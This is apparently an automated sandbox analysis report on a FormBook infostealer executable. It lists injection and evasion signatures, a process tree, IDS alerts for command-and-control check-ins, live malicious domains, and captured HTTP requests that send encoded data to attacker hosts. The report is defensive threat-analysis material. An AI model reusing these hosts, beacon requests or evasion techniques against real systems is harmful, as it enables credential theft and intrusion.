Windows Analysis Report
F#U0130YAT #U0130STE#U011e#U0130 L#U0130STE.exe

Overview

General Information

Sample name: F#U0130YAT #U0130STE#U011e#U0130 L#U0130STE.exe
renamed because original name is a hash value
Original sample name: FYAT STE LSTE.exe
Analysis ID: 1633359
MD5: 00435d0f848d07fdd073d36deadb3325
SHA1: df7b77d2c260c82a526051d9562f9cbb3c762e79
SHA256: d60cfe449d93ba39befc0665d74ba3d56c90dcf8ccc14521907e3248d00954d5
Tags: exe, geo, TUR, user-abuse_ch

Detection

FormBook
Score: 100
Range: 0 - 100
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected FormBook
Binary is likely a compiled AutoIt script file
Found direct / indirect Syscall (likely to bypass EDR)
Joe Sandbox ML detected suspicious sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Performs DNS queries to domains with low reputation
Queues an APC in another process (thread injection)
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Writes to foreign memory regions
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
OS version to string mapping found (often used in BOTs)
Potential key logger detected (key state polling based)
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Uncommon Svchost Parent Process
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Uses reg.exe to modify the Windows registry

Classification

  • System is w10x64
  • F#U0130YAT #U0130STE#U011e#U0130 L#U0130STE.exe (PID: 7092 cmdline: "C:\Users\user\Desktop\F#U0130YAT #U0130STE#U011e#U0130 L#U0130STE.exe" MD5: 00435D0F848D07FDD073D36DEADB3325)
    • svchost.exe (PID: 6620 cmdline: "C:\Users\user\Desktop\F#U0130YAT #U0130STE#U011e#U0130 L#U0130STE.exe" MD5: 1ED18311E3DA35942DB37D15FA40CC5B)
      • uD8F5JGUDvEpNoCYQYtn.exe (PID: 6120 cmdline: "C:\Program Files (x86)\GCXkjJfnLpqeNWrbCBnxfNSIvuGNdmaLjBbQFrtCdlTp\5QQLa49ept.exe" MD5: 9C98D1A23EFAF1B156A130CEA7D2EE3A)
        • reg.exe (PID: 4168 cmdline: "C:\Windows\SysWOW64\reg.exe" MD5: CDD462E86EC0F20DE2A1D781928B1B0C)
          • uD8F5JGUDvEpNoCYQYtn.exe (PID: 356 cmdline: "C:\Program Files (x86)\GCXkjJfnLpqeNWrbCBnxfNSIvuGNdmaLjBbQFrtCdlTp\mFe7Rma2a.exe" MD5: 9C98D1A23EFAF1B156A130CEA7D2EE3A)
          • firefox.exe (PID: 7464 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • cleanup
No configs have been found
Source | Rule | Description | Author | Strings
00000004.00000002.3579520050.0000000002F00000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
0000000D.00000002.3583192639.0000000005910000.00000040.80000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
00000004.00000002.3579268739.0000000002C50000.00000040.80000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
00000004.00000002.3579601950.0000000002F50000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
00000002.00000002.1260442665.0000000006120000.00000040.10000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |

Source | Rule | Description | Author | Strings
2.2.svchost.exe.400000.0.unpack | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
2.2.svchost.exe.400000.0.raw.unpack | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |

                System Summary

                Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Users\user\Desktop\F#U0130YAT #U0130STE#U011e#U0130 L#U0130STE.exe", CommandLine: "C:\Users\user\Desktop\F#U0130YAT #U0130STE#U011e#U0130 L#U0130STE.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\F#U0130YAT #U0130STE#U011e#U0130 L#U0130STE.exe", ParentImage: C:\Users\user\Desktop\F#U0130YAT #U0130STE#U011e#U0130 L#U0130STE.exe, ParentProcessId: 7092, ParentProcessName: F#U0130YAT #U0130STE#U011e#U0130 L#U0130STE.exe, ProcessCommandLine: "C:\Users\user\Desktop\F#U0130YAT #U0130STE#U011e#U0130 L#U0130STE.exe", ProcessId: 6620, ProcessName: svchost.exe
                Source: Process startedAuthor: vburov: Data: Command: "C:\Users\user\Desktop\F#U0130YAT #U0130STE#U011e#U0130 L#U0130STE.exe", CommandLine: "C:\Users\user\Desktop\F#U0130YAT #U0130STE#U011e#U0130 L#U0130STE.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\F#U0130YAT #U0130STE#U011e#U0130 L#U0130STE.exe", ParentImage: C:\Users\user\Desktop\F#U0130YAT #U0130STE#U011e#U0130 L#U0130STE.exe, ParentProcessId: 7092, ParentProcessName: F#U0130YAT #U0130STE#U011e#U0130 L#U0130STE.exe, ProcessCommandLine: "C:\Users\user\Desktop\F#U0130YAT #U0130STE#U011e#U0130 L#U0130STE.exe", ProcessId: 6620, ProcessName: svchost.exe


                AV Detection

                Source: http://www.mylivingbio.online/dj43/Avira URL Cloud: Label: malware
                Source: http://www.maxank.top/esrt/Avira URL Cloud: Label: malware
                Source: http://www.full4movies.christmas/eg1u/Avira URL Cloud: Label: malware
                Source: F#U0130YAT #U0130STE#U011e#U0130 L#U0130STE.exeVirustotal: Detection: 36%
                Source: F#U0130YAT #U0130STE#U011e#U0130 L#U0130STE.exeReversingLabs: Detection: 50%
                Source: Yara matchFile source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000004.00000002.3579520050.0000000002F00000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000D.00000002.3583192639.0000000005910000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.3579268739.0000000002C50000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.3579601950.0000000002F50000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.1260442665.0000000006120000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.1257841114.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000002.3581016954.00000000027A0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.1258855778.0000000003D90000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Submitted Sample, Integrated Neural Analysis Model: Matched 100.0% probability
                Source: F#U0130YAT #U0130STE#U011e#U0130 L#U0130STE.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                Source: Binary string: wntdll.pdbUGP source: F#U0130YAT #U0130STE#U011e#U0130 L#U0130STE.exe, 00000000.00000003.1123779592.00000000038D0000.00000004.00001000.00020000.00000000.sdmp, F#U0130YAT #U0130STE#U011e#U0130 L#U0130STE.exe, 00000000.00000003.1125102326.0000000003AC0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1258295138.0000000003B9E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1159403940.0000000003600000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1258295138.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1161483061.0000000003800000.00000004.00000020.00020000.00000000.sdmp, reg.exe, 00000004.00000003.1264498684.00000000032AB000.00000004.00000020.00020000.00000000.sdmp, reg.exe, 00000004.00000002.3581100186.0000000003460000.00000040.00001000.00020000.00000000.sdmp, reg.exe, 00000004.00000002.3581100186.00000000035FE000.00000040.00001000.00020000.00000000.sdmp, reg.exe, 00000004.00000003.1258534996.00000000030F2000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdb source: F#U0130YAT #U0130STE#U011e#U0130 L#U0130STE.exe, 00000000.00000003.1123779592.00000000038D0000.00000004.00001000.00020000.00000000.sdmp, F#U0130YAT #U0130STE#U011e#U0130 L#U0130STE.exe, 00000000.00000003.1125102326.0000000003AC0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000002.00000002.1258295138.0000000003B9E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1159403940.0000000003600000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1258295138.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1161483061.0000000003800000.00000004.00000020.00020000.00000000.sdmp, reg.exe, reg.exe, 00000004.00000003.1264498684.00000000032AB000.00000004.00000020.00020000.00000000.sdmp, reg.exe, 00000004.00000002.3581100186.0000000003460000.00000040.00001000.00020000.00000000.sdmp, reg.exe, 00000004.00000002.3581100186.00000000035FE000.00000040.00001000.00020000.00000000.sdmp, reg.exe, 00000004.00000003.1258534996.00000000030F2000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: reg.pdb source: svchost.exe, 00000002.00000003.1226391540.000000000343B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1226340558.000000000341A000.00000004.00000020.00020000.00000000.sdmp, uD8F5JGUDvEpNoCYQYtn.exe, 00000003.00000003.1645977314.0000000000AC2000.00000004.00000020.00020000.00000000.sdmp, uD8F5JGUDvEpNoCYQYtn.exe, 00000003.00000003.1197869789.0000000000AB4000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: svchost.pdb source: reg.exe, 00000004.00000002.3579738318.0000000002FFE000.00000004.00000020.00020000.00000000.sdmp, reg.exe, 00000004.00000002.3581535514.0000000003A8C000.00000004.10000000.00040000.00000000.sdmp, uD8F5JGUDvEpNoCYQYtn.exe, 0000000D.00000002.3581258793.00000000034DC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000E.00000002.1570677755.0000000034DBC000.00000004.80000000.00040000.00000000.sdmp
                Source: Binary string: svchost.pdbUGP source: reg.exe, 00000004.00000002.3579738318.0000000002FFE000.00000004.00000020.00020000.00000000.sdmp, reg.exe, 00000004.00000002.3581535514.0000000003A8C000.00000004.10000000.00040000.00000000.sdmp, uD8F5JGUDvEpNoCYQYtn.exe, 0000000D.00000002.3581258793.00000000034DC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000E.00000002.1570677755.0000000034DBC000.00000004.80000000.00040000.00000000.sdmp
                Source: Binary string: reg.pdbGCTL source: svchost.exe, 00000002.00000003.1226391540.000000000343B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1226340558.000000000341A000.00000004.00000020.00020000.00000000.sdmp, uD8F5JGUDvEpNoCYQYtn.exe, 00000003.00000003.1645977314.0000000000AC2000.00000004.00000020.00020000.00000000.sdmp, uD8F5JGUDvEpNoCYQYtn.exe, 00000003.00000003.1197869789.0000000000AB4000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: C:\Work\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: uD8F5JGUDvEpNoCYQYtn.exe, 00000003.00000000.1182664077.0000000000FFF000.00000002.00000001.01000000.00000004.sdmp, uD8F5JGUDvEpNoCYQYtn.exe, 0000000D.00000000.1341897315.0000000000FFF000.00000002.00000001.01000000.00000004.sdmp
                Source: C:\Users\user\Desktop\F#U0130YAT #U0130STE#U011e#U0130 L#U0130STE.exeCode function: 0_2_001F445A GetFileAttributesW,FindFirstFileW,FindClose,0_2_001F445A
                Source: C:\Users\user\Desktop\F#U0130YAT #U0130STE#U011e#U0130 L#U0130STE.exeCode function: 0_2_001FC6D1 FindFirstFileW,FindClose,0_2_001FC6D1
                Source: C:\Users\user\Desktop\F#U0130YAT #U0130STE#U011e#U0130 L#U0130STE.exeCode function: 0_2_001FC75C FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,0_2_001FC75C
                Source: C:\Users\user\Desktop\F#U0130YAT #U0130STE#U011e#U0130 L#U0130STE.exeCode function: 0_2_001FEF95 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_001FEF95
                Source: C:\Users\user\Desktop\F#U0130YAT #U0130STE#U011e#U0130 L#U0130STE.exeCode function: 0_2_001FF0F2 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_001FF0F2
                Source: C:\Users\user\Desktop\F#U0130YAT #U0130STE#U011e#U0130 L#U0130STE.exeCode function: 0_2_001FF3F3 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_001FF3F3
                Source: C:\Users\user\Desktop\F#U0130YAT #U0130STE#U011e#U0130 L#U0130STE.exeCode function: 0_2_001F37EF FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_001F37EF
                Source: C:\Users\user\Desktop\F#U0130YAT #U0130STE#U011e#U0130 L#U0130STE.exeCode function: 0_2_001F3B12 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_001F3B12
                Source: C:\Users\user\Desktop\F#U0130YAT #U0130STE#U011e#U0130 L#U0130STE.exeCode function: 0_2_001FBCBC FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_001FBCBC
                Source: C:\Windows\SysWOW64\reg.exeCode function: 4_2_02C6C640 FindFirstFileW,FindNextFileW,FindClose,4_2_02C6C640
                Source: C:\Windows\SysWOW64\reg.exeCode function: 4x nop then xor eax, eax4_2_02C59F80
                Source: C:\Windows\SysWOW64\reg.exeCode function: 4x nop then pop edi4_2_02C5E271
                Source: C:\Windows\SysWOW64\reg.exeCode function: 4x nop then mov ebx, 00000004h4_2_032A04F8

                Networking

                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.10:49691 -> 47.239.127.207:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:49709 -> 199.59.243.228:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.10:49712 -> 199.59.243.228:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.10:49695 -> 208.91.197.27:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:49703 -> 162.254.32.77:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:49694 -> 208.91.197.27:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.10:49700 -> 188.114.96.3:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:49741 -> 52.223.13.41:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:49733 -> 13.248.169.48:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:49706 -> 188.114.97.3:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:49737 -> 13.248.169.48:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.10:49740 -> 13.248.169.48:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.10:49744 -> 52.223.13.41:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.10:49720 -> 52.223.13.41:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:49725 -> 154.201.91.246:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.10:49708 -> 188.114.97.3:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:49718 -> 52.223.13.41:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:49715 -> 172.67.169.189:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:49717 -> 52.223.13.41:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:49701 -> 162.254.32.77:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:49707 -> 188.114.97.3:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:49713 -> 172.67.169.189:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:49693 -> 208.91.197.27:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:49739 -> 13.248.169.48:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:49746 -> 199.59.243.228:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:49705 -> 188.114.97.3:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:49702 -> 162.254.32.77:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.10:49716 -> 172.67.169.189:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:49692 -> 208.91.197.27:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:49697 -> 188.114.96.3:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:49719 -> 52.223.13.41:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:49710 -> 199.59.243.228:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:49699 -> 188.114.96.3:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:49726 -> 154.201.91.246:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:49727 -> 154.201.91.246:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:49698 -> 188.114.96.3:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:49747 -> 199.59.243.228:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.10:49732 -> 208.91.197.27:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:49711 -> 199.59.243.228:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:49730 -> 208.91.197.27:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:49721 -> 104.21.50.219:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:49735 -> 13.248.169.48:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.10:49748 -> 199.59.243.228:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.10:49728 -> 154.201.91.246:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:49751 -> 103.224.182.242:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:49749 -> 103.224.182.242:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:49734 -> 13.248.169.48:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:49722 -> 104.21.50.219:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:49738 -> 13.248.169.48:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:49729 -> 208.91.197.27:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:49742 -> 52.223.13.41:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:49723 -> 104.21.50.219:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.10:49736 -> 13.248.169.48:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.10:49724 -> 104.21.50.219:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.10:49704 -> 162.254.32.77:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:49743 -> 52.223.13.41:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:49745 -> 199.59.243.228:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:49750 -> 103.224.182.242:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:49714 -> 172.67.169.189:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:49731 -> 208.91.197.27:80
                Source: DNS query: www.tgwfj.xyz
                Source: DNS query: www.chatdn.xyz
                Source: DNS query: www.nodefolio.xyz
                Source: Joe Sandbox ViewIP Address: 13.248.169.48 13.248.169.48
                Source: Joe Sandbox ViewIP Address: 188.114.97.3 188.114.97.3
                Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
                Source: Joe Sandbox ViewASN Name: AMAZON-02US AMAZON-02US
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: C:\Users\user\Desktop\F#U0130YAT #U0130STE#U011e#U0130 L#U0130STE.exeCode function: 0_2_002022EE InternetReadFile,InternetQueryDataAvailable,InternetReadFile,0_2_002022EE
                Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKdate: Mon, 10 Mar 2025 08:30:32 GMTserver: Apacheset-cookie: __tad=1741595432.2786700; expires=Thu, 08-Mar-2035 08:30:32 GMT; Max-Age=315360000vary: Accept-Encodingcontent-encoding: gzipcontent-length: 579content-type: text/html; charset=UTF-8connection: close
                Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKdate: Mon, 10 Mar 2025 08:30:35 GMTserver: Apacheset-cookie: __tad=1741595435.3472907; expires=Thu, 08-Mar-2035 08:30:35 GMT; Max-Age=315360000vary: Accept-Encodingcontent-encoding: gzipcontent-length: 579content-type: text/html; charset=UTF-8connection: close
                Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKdate: Mon, 10 Mar 2025 08:30:38 GMTserver: Apacheset-cookie: __tad=1741595438.3640738; expires=Thu, 08-Mar-2035 08:30:38 GMT; Max-Age=315360000vary: Accept-Encodingcontent-encoding: gzipcontent-length: 579content-type: text/html; charset=UTF-8connection: close
                Source: global trafficHTTP traffic detected: GET /7aoy/?SDCxHX=fp2YbicaeZCvjPlEl0aAeG9DbZJy1pf6RkH12Jc9jsEP3xNt5+yvvuwn7GzaPio27TEiEJpJOLWrHvzanHbqYQ6Or2IgxZPOC+3XvFLXIb3BAGz51g==&zLCH9=HfZTbDVXP6ETB0p HTTP/1.1Host: www.5s5zz.icuAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.4; LIFETAB_P891X Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.135 Safari/537.36
                Source: global trafficHTTP traffic detected: GET /dj43/?SDCxHX=EkKoskt/waFvdKqmMTR0BsFP9LxzFNjCRcrbFleOd9fMl1ZZ6F30QdqQrdjttZXwjkEVztFs7SmMJNK/tzPQzSfbDzyFZPAXpe7tXMSlJsvQQj1JOw==&zLCH9=HfZTbDVXP6ETB0p HTTP/1.1Host: www.mylivingbio.onlineAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.4; LIFETAB_P891X Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.135 Safari/537.36
